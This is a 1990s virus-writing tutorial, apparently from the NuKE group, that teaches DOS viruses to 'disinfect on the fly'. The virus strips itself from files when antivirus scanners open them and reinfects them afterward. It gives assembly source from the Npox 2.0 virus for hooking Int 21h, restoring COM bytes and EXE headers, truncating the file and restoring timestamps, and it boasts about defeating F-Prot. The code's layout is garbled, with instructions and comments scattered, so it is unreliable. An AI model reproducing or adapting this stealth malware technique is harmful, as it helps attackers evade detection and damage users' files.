*************************************

** Disinfecting an Infected File **

**
**
**
By Rock Steady/NuKE
**
*************************************
The BEST advantage a virus can have is `Disinfecting of Fly' as we must
try to basically hide the virus as well as possible! And nowadays AntiVirus programs are going crazy. As I remember at the time Npox 2.0 was
developed it would Disinfect every file opened by F-prot and Scan and
when the Scanner found nothing and closed the file to go on to the next
Npox would re-infect them. Truly can cause havoc, As a matter of fact
Frisk didn't like this as I had some `Anti Fuck-Prot' routines and he
added his own routine to open files by Int21h/6C00h, as Npox only
disinfected on Int21h/3Dh, however to make the virus disinfect on
Int21h/6C00h, doesn't require much work, simply to take the ASCIIZ
string at DS:SI and put SI into DX so we have DS:DX pointing to it,
then run this routine.
The Basic idea on disinfection is this...
-For .COM files
Restore the first 3 bytes original Bytes of the program, these
3 bytes are usually somewhere inside the virus, and then simply
remove the virus from the end of the .COM file!
We do this by jumping to the end of the COM file and subtracting
the Virus size from the File size and that new value is the
original file size!
NOTE: if you write a virus that its length changes (Polymorphic)
its wise to save the original Filesize to be infected before
hand.
-For .EXE files & Overlays
This procedure is not different, just that if you changed CS:IP &
SP:SS in the EXE header, simply restore the original values, or to
save time, simple save the Original EXE header (first 1b bytes) in
the virus and right that to the beginning as I did for Npox 2.0
Then Subtract yourself from the original size and cut it off!
I will now follow thru the Npox 2.0 virus routine Closely so you can under
stand this process.
Okay first thing you would want to do is CHECK if this is
If the virus infects COMs & EXEs, do not waste your time looking thru
other extensions, or for tight code you can waste your time and "HOPE"
the `infection' marker will fail! Meaning if the virus uses the seconds
field set to 60 (as Npox) then naturally only INFECTED files will have
a time stamp of 60! And this routine is not needed...
opening_file:

call
jnc
call
jnc
jmp

check_extension
open_fuck2
check_exten_exe
open_fuck2
dword ptr cs:[int21]

;Check for .COM extension

;YES; Jmp & Disinfect
;Check for .EXE extension
;YES; Jmp & disinfect
;Other wise goto DOS

; At this point the file has an .COM or .EXE extension, so we continue

open_fuck2:

push
ax
;Save AX
mov
ax,3d02h
;Ready to open
call
calldos21
;Do it!
;NOTE: its important you called Int21h YOURSELF! you CAN NOT do a "Int 21h"

;command, as the virus will intercept it, and will come to this routine
;and it will continue over and over again, Never ending l
;stack gets too big, overwrite the code and the system ja
;in about 2 seconds...
jnc
open_fuck1
;No Error Continue
pop
ax
;restore
iret
;Exit
open_fuck1:

push
push
push
push
mov
mov
call

bx
cx
dx
ds
bx,ax
ax,5700h
calldos21

mov
or
dec
xor
jnz

al,cl
cl,1fh
cx
al,cl
opening_exit3

dec
mov
mov

cx
word ptr cs:[old_time],cx ;Save
word ptr cs:[old_date],dx ;Save Date Stamp

mov
xor
xor
call

ax,4202h
cx,cx
dx,dx
calldos21

;Goto the End of File

mov
mov

cx,dx
dx,ax

push
push

cx
dx

;Save the filesize

;we will need it later
;to subtract the virus
;size fromit...
;Save it...

;BX=File handler
;Get file TimeStamp
;move seconds into al
;Left just seconds
;60 Seconds
;cmp
;NOT 60 seconds exit!

Here now we get the first 3 bytes (for com) or first 1B bytes (EXE header)
in the Nuke Pox virus I save the ORIGINAL first 3 bytes of the .com at
the VERY END! Since the buffer I made was 1B hex bytes, it is able to
hold the EXE header or 3 .com bytes, anyhow the beginning of these
bytes are the last 1B bytes, since its at the end... figure it out where
you saved your 3 bytes or exe header for your virus, or use the Npox
routine...
sub
sbb
mov
call

dx,1Bh
cx,0
ax,4200h
calldos21

;Subtract 1B bytes from

;the filesize!
;Now our pointer will
;point to the 1B bytes
;Where the COM & EXE
;original bytes are

push
pop

cs
ds

;CS=DS (for exes)

mov
mov
mov
call

ah,3fh
cx,1Bh
dx,offset buffer
calldos21

;Read them into Buffer

;1B bytes
;to our buffer

humm, now we got the original bytes, all we gotta do is write them

back to the file's beginning...

open_exe_jmp:

xor
xor
mov
call

cx,cx
dx,dx
ax,4200h
calldos21

;Goto Beginning of File

;

mov
mov
mov
cmp
je
mov
call

ah,40h
;Write first three bytes
dx,offset buffer
;our buffer
cx,1Bh
;1B bytes for EXEs
word ptr cs:[buffer],5A4Dh
open_exe_jmp
;if EXE file jump
cx,3h
;if COM write only 3 bytes
calldos21

We wrote the original file's data back to place, now we need to cut the
virus off from the file, the virus is written at the end of the file,
so all we do is set our file-pointer to EOF - Virus_Size, which gives
us the original file length!
pop
pop
sub
sbb
mov
call

dx
cx
dx,virus_size
cx,0
ax,4200h
calldos21

;EOF - Virus_Size
;to get ORIGINAL File size
;subtract virus size

Now this is perhaps the "TRICKIEST" part, in order to "CROP" the file, at
our new ptr location, what we do it use does to crop it, by writing 0
bytes to the new location, DOS will make that new location the NEW
EoF and in result cutting off the virus and deleting its sector in the
fat.
mov
xor
call

ah,40h
cx,cx
calldos21

mov
mov
mov
int

cx,word ptr cs:[old_time]

dx,word ptr cs:[old_date]
ax,5701h
21h

mov
call

ah,3eh
calldos21

opening_exit3: pop
pop
pop
pop
pop
jmp

;Write new EOF

;Zero Bytes
;doit
;Restore file time
;Restore file date

ds
dx
cx
bx
ax
dword ptr cs:[int21]

;Close File

;Return to DOS...

ahh, the file is now Disinfected, now we safely return it to DOS and DOS
may now open the file for inspection...
Rock Steady/NuKE